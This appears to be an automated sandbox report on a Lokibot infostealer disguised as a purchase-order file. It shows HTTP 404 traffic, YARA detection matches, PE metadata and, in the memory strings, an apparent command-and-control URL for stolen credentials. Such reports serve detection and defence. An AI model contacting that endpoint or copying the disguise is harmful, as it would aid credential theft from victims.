Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYNPQvfEvhcxvWS5VOwyv1yCxKs9S6JEkOwfyx3RjxadntpJv2RzLrlFZRp56wfTzQ2dmLvOX8O9Hv2L%2FvZBIT4sak%2BxLo1vG8eTncdh5iPL6uHT%2BlQlPccAjOMZVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89990d18c30f8b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKak2L11Xor6Cks1pxpaUNVX7%2FG3MWLUmSZSG1rQ1w0JNo1uVK0NRltaH4BAjCkUnG2Y8%2BsWnC%2FiR9eMIYPmoOqeD1Z5NjZ5wYAYxNOcqXJpEuIjPpLGKn8FVhGs%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999125e44c328-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4rH88egtgd%2BmdE0RFrzRYFc74p1SlsBf6cIp1oInjThlXgm4WQ5dIGCS28TId35WAASkWcoMynTtj09kEA7fCbc01aa%2BTwWQNkygn4j%2B5zhG%2FjLxGcHceh69tjzjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999179cdd1986-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8r09Fk3GS1KIdlpuUcIu5XLceQyeTbydkjA1Tfayb5YOsfLWEAg0S9sJDQCPI3T4TSHeH2NDY61dqA7fvQ%2Be621zKyBBvBFznmJYmnUIaQwBPYPIh8DCjtrsSRJv7w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89991cc9b9437f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e4O5SjfyKvTvkcIORLmMnvmUOjGDOBiHXCjmczcCi5SRaa4TwCPstAOVz5AReChb2g5mRllfaNU1j2Y6BHgbfZFf869hVw2cjN8CFbVHN6J9UqY9KxfKQD5D9H9xMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999243c61c431-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMOcjA%2BZD9nEySF8HZ0ApDjYpEAhiuWRxzAwsZU1bdsxiwev9gOZAvYFdH1M4ugHcscx21X4kx5WCGigAmgPBFZ%2FOleLygR2dZqyqKfAbrdHLmHGBKVv2mX2C4YsiA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899929aed28cb9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKRZk6oGtDJ3r6yBekAvvzCWk16HaByFAzu%2B34ddDGG00WJYzLZGuBoFI15MddBealgyk9iGU%2BxHbSZRL0J8k1pNTYO%2Fl7Ie1Y0chp%2BhDzXudi0pwngadlF5gizOKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89992eeffa19bb-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gx99izGIh%2FhPUSzQ%2Fjm5sfY78Uczy4Fz6Lf1JzgS%2BQac3yxT9%2FOGEOIyHNzpwNiD4JKyCwQny9KKaOXuGeX2qBeFPEcSvMXLDdPolbOB77E1inf5LPUPjYz4Gpgp9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999354f96c466-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF2zcAi9NSmA7H3dAbBS6rU3%2BkgNWuFeoUW0k%2BWdj05gubJbynp1jf0jislSiM6aHZPw3pte2MIYWRVvmSEf7HZIYtbozA0pVOJduwF09%2FgLu4kzz9svG67tYfmolQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89993a8ff89e05-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sd027RfBO%2Bcqegf6S%2BUUDd3WfjlqnPGlWJqTSvrIgLryM73VDDSQQ5S%2BkfiCtolVtgTV7cNIe5JVTZESnvhSm%2BL75y6e9%2BnLgGczxDj0ZLUa6V0e2OfFnHTNBN6c7A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999418e6a443e-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BwDBx0OK%2BRQJl9nrYcEhkc7BTzDUiSeiQN3VRYoAZK7uY3VGbOSOn2%2B%2FZWpu0rFDTBgYgxD32emXo6nTjV7hz5i1wnxjWYCV7PJEyMhydln1C0ly8Gpd3ePZ5bHFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999467c8a41e0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDxjuXrvZUxpxuejXKzBOrxjdTX1QpUxXi6abbGz8YhcvWFocTa%2FgBNUKV5gcDTRix75MDTDD%2BY%2Bk5iXku76DeP0UGCp18kgGQmMFufdM5NQS8xT2xNX4EEiyo5ODQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89994b9c0e0f45-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4jcox0invbQ3ydcBcLmK7s%2FnQZpXOrimvFowBTIPwZO2tcOhf7m%2Bs6Q%2F9rbvWUWNjmrkJO%2BpLvXFNLUC9Rr5ZnX%2Fum4vQFgcZebIrZ52CnRqeF5BdR1T706%2BC8A3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999509e1d7d00-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDcElRujfFU27a2MSEyRLrCXsYnSVPMvJY%2BXltO4vZbvO7W%2Fw5HO%2FS%2FMqBmgEIRf2SJsyd1zQTe%2FMIys%2Bs6sLmEol3wBvcEryW9Tk16gBmb8LUaYGC0QKXnIa3PjsA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899956add0c413-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y53BXyOf9asEuqVE6J%2FMQ3XO%2FKsdUDDHI8UlJSP7cN1yjAbpntEtz1TSYTVoYxrtH2qJ1F751bdWCsXAGqclNloJ21BV683TVNkZNNEg2JBDnaJPWAx%2Bz8jANvN9nQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899963afd28c99-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qwXGPoU5sTtXbjCZkY8QdIYtL2TYr1Hb1pVF8qz0lRzW52Qfct0LvFZUxbdYYWfZ%2F3jltHllV9R%2F7QQajJZDUZ3ZmUPxIG%2FAXn8Q3IKuH8nrq6l49CEIpbO7tTEoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999692a387c96-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6MPIsfFruZUhXYken8dVVxkrQSldtml8W3lYv63eRu%2Bwzocz6AQ8xEHTpRnEskMtEYqnVrwDRqgcY7GopvuO%2Bnnkk8rhH1%2Bku3lxqENKGORfKdhi1EtJuhbYjZf9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89996e6d718c8a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKihcROsUu%2FMWQYq23ZOZZHOwdkBYi2BW%2FeoduepUa05Ad68Xoaa8QYaqxouPQGRqSDt%2BlRUP1ApI5B183MAyxbNnRLYDyCVjLo9ZwsauJDMUMaPYTqMn8Z2If5ZPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999740fe617d9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: aspnet_compiler.exe, 00000002.00000002.2590229710.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2589893075.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: (PO403810)_VOLEX_doc.exe

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Code function: 0_2_017439C0	0_2_017439C0
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Code function: 0_2_01744001	0_2_01744001
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Code function: 0_2_01743FC3	0_2_01743FC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: (PO403810)_VOLEX_doc.exe, 00000000.00000000.1331954900.0000000000C04000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSept10F.exe0 vs (PO403810)_VOLEX_doc.exe
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000040FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs (PO403810)_VOLEX_doc.exe
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBATMAN.dll. vs (PO403810)_VOLEX_doc.exe
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBATMAN.dll. vs (PO403810)_VOLEX_doc.exe
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1335607654.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs (PO403810)_VOLEX_doc.exe
Source: (PO403810)_VOLEX_doc.exe	Binary or memory string: OriginalFilenameSept10F.exe0 vs (PO403810)_VOLEX_doc.exe

Source: (PO403810)_VOLEX_doc.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
